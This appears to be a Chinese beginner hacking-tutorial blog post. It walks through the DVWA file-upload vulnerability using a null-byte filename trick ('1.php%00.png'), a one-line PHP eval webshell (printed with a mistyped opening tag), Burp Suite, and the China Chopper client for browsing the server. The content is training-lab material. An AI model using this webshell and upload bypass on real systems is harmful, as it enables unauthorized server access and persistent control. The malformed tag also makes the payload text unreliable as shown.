在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png 。
文章插图
改成这样的名字!!
文章插图
然后用编辑器编辑一下!
文章插图
在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>
像这样:
文章插图
然后保存!
文章插图
打开burpsuit抓个包看看!!
文章插图
文章插图
【黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门】
可惜了,我们用了%00截断不需要改包!
这样就上传成功!!!
文章插图
在菜刀地址上填上上路径!!再填上上密码!!!
文章插图
就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!
文章插图
然后我们进入我的服务器端看看!!
文章插图
画红线的就是我们上传的木马!!!
推荐阅读
![[国足]喜讯!国足后防线出现新选择,4大归化后卫可用,世预赛不怕了](http://img88.010lm.com/img.php?https://image.uc.cn/s/wemedia/s/2020/a073560cdaea50289238bb24c891b90d.jpg)
![[艺术时尚人生]4种天然养胃药经常吃,一颗好胃伴你到,胃病犯了不用愁](https://imgcdn.toutiaoyule.com/20200419/20200419051056971072a_t.jpeg)
- mysql入门级,20分钟搞定
- 解读黑客入侵你Linux服务器的一万种玩法
- 如何成为一名黑客
- IP地址基础入门知识
- 最经典的黑客技术入门知识大全
- 我的天,内网渗透,大黑客是这样进行操作的
- GNOME Linux 桌面入门
- 利器burpsuit,你真的了解黑客是怎么用的嘛?
- 小白都能使用bash脚本编写黑客工具
- 初级黑客技巧,老系统用的后门技巧